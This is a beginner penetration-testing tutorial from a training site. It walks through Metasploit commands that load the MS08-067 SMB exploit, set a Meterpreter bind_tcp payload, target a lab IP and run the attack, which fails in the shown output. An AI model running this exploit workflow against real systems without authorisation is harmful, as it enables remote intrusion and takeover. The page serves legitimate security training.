LabEx
Log InJoin Free

Use a Bind Shell Payload in Metasploit

Kali LinuxBeginner
Practice Now

Introduction

In this lab, you will learn the fundamental steps of using a bind shell payload in the Metasploit Framework. Metasploit is a powerful penetration testing tool that allows security professionals to find, exploit, and validate vulnerabilities.

A "payload" in Metasploit is the code that runs on the target system after a vulnerability has been successfully exploited. A "bind shell" payload is a specific type that opens a listening port on the target machine. The attacker then connects to this port to gain a command shell and control the system. This is different from a "reverse shell," where the target machine initiates a connection back to the attacker.

Throughout this lab, you will practice the complete workflow: launching Metasploit, selecting an exploit, configuring a bind shell payload with the necessary options, and attempting to run the exploit.

Select an exploit module for a target

In this step, you will start the Metasploit Framework console and select an exploit module. An exploit is a piece of code that takes advantage of a specific vulnerability in a system. For this lab, we will use a well-known exploit for demonstration purposes.

First, open your terminal and launch the Metasploit console. We'll use the -q flag for "quiet" mode to skip the banner and start faster.

msfconsole -q

Once the console loads, your prompt will change to msf6 >. Now, you need to select an exploit. We will use the ms08_067_netapi exploit, which targets a vulnerability in the Windows Server service.

Use the use command to load the exploit module:

use exploit/windows/smb/ms08_067_netapi

After running the command, you will see your prompt change to reflect the currently active exploit module.

msf6 > use exploit/windows/smb/ms08_067_netapi
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms08_067_netapi) >

Notice that Metasploit defaulted to a reverse_tcp payload. We will change this in the next step.

Set the payload to windows/meterpreter/bind_tcp

In this step, you will change the default payload to a bind shell payload. As mentioned in the introduction, a bind payload will open a port on the target system, waiting for the attacker to connect.

We will use windows/meterpreter/bind_tcp. This payload not only gives you a shell but a Meterpreter session, which is an advanced, feature-rich payload that provides more control over the target system.

Inside the msfconsole prompt, use the set payload command to specify the new payload:

set payload windows/meterpreter/bind_tcp

Metasploit will confirm the change.

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp

You have now successfully configured the exploit to use a bind Meterpreter payload.

Set the RHOSTS option for the exploit

In this step, you need to specify the target of your exploit. In Metasploit, the target address is set using the RHOSTS (Remote Hosts) option.

You must tell Metasploit which machine to attack. In a real-world scenario, you would have discovered the IP address of a vulnerable machine through reconnaissance. For this lab, we will use a placeholder IP address.

Use the set command to configure the RHOSTS option. Let's set it to 172.17.0.2, which is a common IP address for a container on a Docker bridge network.

set RHOSTS 172.17.0.2

The console will confirm that the RHOSTS option has been set.

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 172.17.0.2
RHOSTS => 172.17.0.2

Now Metasploit knows where to send the exploit.

Set the LPORT option for the payload on the target

In this step, you will configure the listening port for the bind shell. With a bind payload, the LPORT (Local Port) option specifies the TCP port that the payload will open on the target machine. This is a crucial concept: you are defining the port you will connect to after the exploit succeeds.

We will use the common port 4444 for this purpose.

Use the set command to configure the LPORT option:

set LPORT 4444

The console will confirm the setting.

msf6 exploit(windows/smb/ms08_067_netapi) > set LPORT 4444
LPORT => 4444

To be sure all our options are set correctly, you can use the show options command to review the configuration for both the exploit and the payload.

show options

You should see an output table where RHOSTS and LPORT are correctly set with the values you provided.

...
Payload options (windows/meterpreter/bind_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LPORT  4444             yes       The listen port
   RHOST  172.17.0.2       no        The target address

Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting
...

Run the exploit and connect to the listening port

In this step, with all options configured, you will launch the attack. The exploit command (or its alias, run) tells Metasploit to send the exploit and payload to the target.

Now, run the exploit:

exploit

Important Note: In this lab environment, there is no vulnerable Windows machine at the 172.17.0.2 address. Therefore, the exploit will fail. The purpose of this step is to understand the command and observe the process. In a real penetration test, if the target were vulnerable, this command would create a session.

You will see Metasploit attempt to connect, but it will eventually time out. The output will look something like this:

msf6 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started bind TCP handler against 172.17.0.2:4444
[*] 172.17.0.2:445 - Automatically detecting the target...
[*] 172.17.0.2:445 - Fingerprint: Unknown
[-] 172.17.0.2:445 - The target is not exploitable.
[*] Exploit completed, but no session was created.

This output is expected. It confirms that Metasploit ran the exploit, but no session was established because the target was not vulnerable or reachable. You have successfully completed the workflow for using a bind shell payload.

To exit the Metasploit console, type exit:

exit

Summary

In this lab, you have learned the essential process of configuring and using a bind shell payload within the Metasploit Framework.

You practiced the core workflow:

  1. Starting the Metasploit console (msfconsole).
  2. Selecting an exploit module with the use command.
  3. Setting a specific payload with set payload.
  4. Configuring target-specific options like RHOSTS (the target's IP) and LPORT (the listening port on the target).
  5. Executing the attack with the exploit command.

Most importantly, you now understand the key characteristic of a bind shell: it opens a listener on the target system, requiring the attacker to connect to it. This foundational knowledge is critical for conducting penetration tests and understanding different methods of gaining remote access.

Related Kali Linux Courses
Kali Linux for Beginners

Kali Linux for Beginners

cybersecuritykalilinux
Kali Server Exploitation in Action

Kali Server Exploitation in Action

cybersecuritykalilinux